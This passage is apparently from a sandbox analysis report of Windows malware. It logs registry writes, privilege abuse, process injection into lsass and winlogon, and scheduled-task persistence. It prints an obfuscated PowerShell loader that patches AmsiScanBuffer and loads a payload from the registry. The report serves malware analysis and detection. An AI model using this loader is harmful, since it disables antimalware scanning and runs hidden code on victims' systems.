00630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000561f5de31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36316365313832373534636230353337383264333963633839303132386362616461383461643663373634306336626130633534313136356436343037613534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000072696a746f6f7678000000000000000072e9330fb5301f4a9e010962a32a67ecee38b9f9290def11a084eaa3b7af2fc172e9330fb5301f4a9e010962a32a67ecee38b9f9290def11a084eaa3b7af2fc1ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003800300034003100350030003900330037002d0032003100340036003700300038003400300031002d003400310039003000390035003000370031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000072b368a9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = "\\\\?\\Volume{A968B372-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\61ce182754cb053782d39cc890128cbada84ad6c7640c6ba0c541165d6407a54"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001583c30f19a6da01f8cef00f19a6da01f8cef00f19a6da01530400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5827812000363163653138323735346362303533373832643339636338393031323863626164613834616436633736343063366261306335343131363564363430376135340000b20009000400efbeae582781ae5827812e00000000000000000000000000000000000000000000000000453aca00360031006300650031003800320037003500340063006200300035003300370038003200640033003900630063003800390030003100320038006300620061006400610038003400610064003600630037003600340030006300360062006100300063003500340031003100360035006400360034003000370061003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000561f5de31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36316365313832373534636230353337383264333963633839303132386362616461383461643663373634306336626130633534313136356436343037613534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000072696a746f6f7678000000000000000072e9330fb5301f4a9e010962a32a67ecf038b9f9290def11a084eaa3b7af2fc172e9330fb5301f4a9e010962a32a67ecf038b9f9290def11a084eaa3b7af2fc1ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003800300034003100350030003900330037002d0032003100340036003700300038003400300031002d003400310039003000390035003000370031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000072b368a9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb-	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEpowershell.EXEdllhost.exeClient.exeWerFault.exesvchost.exe

pid	process
2220	powershell.EXE
2220	powershell.EXE
4804	powershell.EXE
4804	powershell.EXE
2220	powershell.EXE
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4996	Client.exe
4804	powershell.EXE
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4588	WerFault.exe
4588	WerFault.exe
4332	dllhost.exe
4332	dllhost.exe
4996	Client.exe
4332	dllhost.exe
4332	dllhost.exe
5040	svchost.exe
5040	svchost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe
4332	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3408 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Uni.exepowershell.EXEClient.exepowershell.EXEdllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2400	Uni.exe
Token: SeDebugPrivilege	2220	powershell.EXE
Token: SeDebugPrivilege	4996	Client.exe
Token: SeDebugPrivilege	4804	powershell.EXE
Token: SeDebugPrivilege	2220	powershell.EXE
Token: SeDebugPrivilege	4332	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2360	svchost.exe
Token: SeIncreaseQuotaPrivilege	2360	svchost.exe
Token: SeSecurityPrivilege	2360	svchost.exe
Token: SeTakeOwnershipPrivilege	2360	svchost.exe
Token: SeLoadDriverPrivilege	2360	svchost.exe
Token: SeSystemtimePrivilege	2360	svchost.exe
Token: SeBackupPrivilege	2360	svchost.exe
Token: SeRestorePrivilege	2360	svchost.exe
Token: SeShutdownPrivilege	2360	svchost.exe
Token: SeSystemEnvironmentPrivilege	2360	svchost.exe
Token: SeUndockPrivilege	2360	svchost.exe
Token: SeManageVolumePrivilege	2360	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2360	svchost.exe
Token: SeIncreaseQuotaPrivilege	2360	svchost.exe
Token: SeSecurityPrivilege	2360	svchost.exe
Token: SeTakeOwnershipPrivilege	2360	svchost.exe
Token: SeLoadDriverPrivilege	2360	svchost.exe
Token: SeSystemtimePrivilege	2360	svchost.exe
Token: SeBackupPrivilege	2360	svchost.exe
Token: SeRestorePrivilege	2360	svchost.exe
Token: SeShutdownPrivilege	2360	svchost.exe
Token: SeSystemEnvironmentPrivilege	2360	svchost.exe
Token: SeUndockPrivilege	2360	svchost.exe
Token: SeManageVolumePrivilege	2360	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2360	svchost.exe
Token: SeIncreaseQuotaPrivilege	2360	svchost.exe
Token: SeSecurityPrivilege	2360	svchost.exe
Token: SeTakeOwnershipPrivilege	2360	svchost.exe
Token: SeLoadDriverPrivilege	2360	svchost.exe
Token: SeSystemtimePrivilege	2360	svchost.exe
Token: SeBackupPrivilege	2360	svchost.exe
Token: SeRestorePrivilege	2360	svchost.exe
Token: SeShutdownPrivilege	2360	svchost.exe
Token: SeSystemEnvironmentPrivilege	2360	svchost.exe
Token: SeUndockPrivilege	2360	svchost.exe
Token: SeManageVolumePrivilege	2360	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2360	svchost.exe
Token: SeIncreaseQuotaPrivilege	2360	svchost.exe
Token: SeSecurityPrivilege	2360	svchost.exe
Token: SeTakeOwnershipPrivilege	2360	svchost.exe
Token: SeLoadDriverPrivilege	2360	svchost.exe
Token: SeSystemtimePrivilege	2360	svchost.exe
Token: SeBackupPrivilege	2360	svchost.exe
Token: SeRestorePrivilege	2360	svchost.exe
Token: SeShutdownPrivilege	2360	svchost.exe
Token: SeSystemEnvironmentPrivilege	2360	svchost.exe
Token: SeUndockPrivilege	2360	svchost.exe
Token: SeManageVolumePrivilege	2360	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2360	svchost.exe
Token: SeIncreaseQuotaPrivilege	2360	svchost.exe
Token: SeSecurityPrivilege	2360	svchost.exe
Token: SeTakeOwnershipPrivilege	2360	svchost.exe
Token: SeLoadDriverPrivilege	2360	svchost.exe
Token: SeSystemtimePrivilege	2360	svchost.exe
Token: SeBackupPrivilege	2360	svchost.exe
Token: SeRestorePrivilege	2360	svchost.exe
Token: SeShutdownPrivilege	2360	svchost.exe
Token: SeSystemEnvironmentPrivilege	2360	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Explorer.EXE6Rs8wA3zbw4c.exe

pid	process
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
4756	6Rs8wA3zbw4c.exe
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE
3408	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Client.exe6Rs8wA3zbw4c.exeScreenClippingHost.exeScreenClippingHost.exe

pid process

4996 Client.exe
4756 6Rs8wA3zbw4c.exe
2780 ScreenClippingHost.exe
3016 ScreenClippingHost.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3408 Explorer.EXE

pid	process
4996	Client.exe
4756	6Rs8wA3zbw4c.exe
2780	ScreenClippingHost.exe
3016	ScreenClippingHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Uni.exeClient.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2400 wrote to memory of 640	2400	Uni.exe	schtasks.exe
PID 2400 wrote to memory of 640	2400	Uni.exe	schtasks.exe
PID 2400 wrote to memory of 640	2400	Uni.exe	schtasks.exe
PID 2400 wrote to memory of 4996	2400	Uni.exe	Client.exe
PID 2400 wrote to memory of 4996	2400	Uni.exe	Client.exe
PID 2400 wrote to memory of 4996	2400	Uni.exe	Client.exe
PID 2400 wrote to memory of 4904	2400	Uni.exe	install.exe
PID 2400 wrote to memory of 4904	2400	Uni.exe	install.exe
PID 2400 wrote to memory of 4904	2400	Uni.exe	install.exe
PID 2400 wrote to memory of 976	2400	Uni.exe	SCHTASKS.exe
PID 2400 wrote to memory of 976	2400	Uni.exe	SCHTASKS.exe
PID 2400 wrote to memory of 976	2400	Uni.exe	SCHTASKS.exe
PID 4996 wrote to memory of 2840	4996	Client.exe	schtasks.exe
PID 4996 wrote to memory of 2840	4996	Client.exe	schtasks.exe
PID 4996 wrote to memory of 2840	4996	Client.exe	schtasks.exe
PID 4996 wrote to memory of 1908	4996	Client.exe	install.exe
PID 4996 wrote to memory of 1908	4996	Client.exe	install.exe
PID 4996 wrote to memory of 1908	4996	Client.exe	install.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 2220 wrote to memory of 4332	2220	powershell.EXE	dllhost.exe
PID 4332 wrote to memory of 612	4332	dllhost.exe	winlogon.exe
PID 4332 wrote to memory of 664	4332	dllhost.exe	lsass.exe
PID 4332 wrote to memory of 940	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1016	4332	dllhost.exe	dwm.exe
PID 4332 wrote to memory of 512	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1048	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1068	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1076	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1208	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1252	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1312	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1336	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1376	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1404	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1420	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1536	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1564	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1596	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1680	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1740	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1784	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1864	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1892	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1900	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1944	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1960	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 1500	4332	dllhost.exe	spoolsv.exe
PID 4332 wrote to memory of 2068	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2204	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2360	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2380	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2392	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2516	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2596	4332	dllhost.exe	sysmon.exe
PID 4332 wrote to memory of 2608	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2620	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2640	4332	dllhost.exe	svchost.exe
PID 4332 wrote to memory of 2676	4332	dllhost.exe	sihost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1016

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{be01f1de-33b9-4114-bb82-d70d5f7ad57d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0eb349d0-ea7d-4a1a-bcd0-8c7422bf74b3}
2⤵
PID:4504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4504 -s 288
3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4588

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1208

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:omHHpgdTiXMl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aZvBHkGxhigjPw,[Parameter(Position=1)][Type]$qBDAgEWYll)$vylXAnALLGT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'eal'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$vylXAnALLGT.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'ec'+[Char](105)+'alNa'+'m'+'e,'+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+'Pu'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aZvBHkGxhigjPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$vylXAnALLGT.DefineMethod(''+[Char](73)+''+[Char](110)+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+','+''+'H'+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$qBDAgEWYll,$aZvBHkGxhigjPw).SetImplementationFlags('R'+'u'+''+'n'+'tim'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+'d'+'');Write-Output $vylXAnALLGT.CreateType();}$TRtBqvTpjMVXa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'em.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+'th'+[Char](111)+'ds');$ihbkpvZSHapRzZ=$TRtBqvTpjMVXa.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zLqdptdTmAGarEoatlZ=omHHpgdTiXMl @([String])([IntPtr]);$nrnmXRgcbirswSbMpLWWbI=omHHpgdTiXMl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PYwzcOkInMm=$TRtBqvTpjMVXa.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'Ha'+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$LAoWFUmiGIIWWG=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$PYwzcOkInMm,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$HLrMWSQsJLWdVzYgJ=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$PYwzcOkInMm,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+'P'+'r'+'o'+''+'t'+'ec'+[Char](116)+'')));$JfyEgRU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LAoWFUmiGIIWWG,$zLqdptdTmAGarEoatlZ).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+'dl'+'l'+'');$tcVKrBGgKSWmWVqKt=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$JfyEgRU,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+'a'+''+[Char](110)+'Buf'+'f'+''+'e'+'r')));$ofBJssVvyl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HLrMWSQsJLWdVzYgJ,$nrnmXRgcbirswSbMpLWWbI).Invoke($tcVKrBGgKSWmWVqKt,[uint32]8,4,[ref]$ofBJssVvyl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tcVKrBGgKSWmWVqKt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HLrMWSQsJLWdVzYgJ,$nrnmXRgcbirswSbMpLWWbI).Invoke($tcVKrBGgKSWmWVqKt,[uint32]8,0x20,[ref]$ofBJssVvyl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](11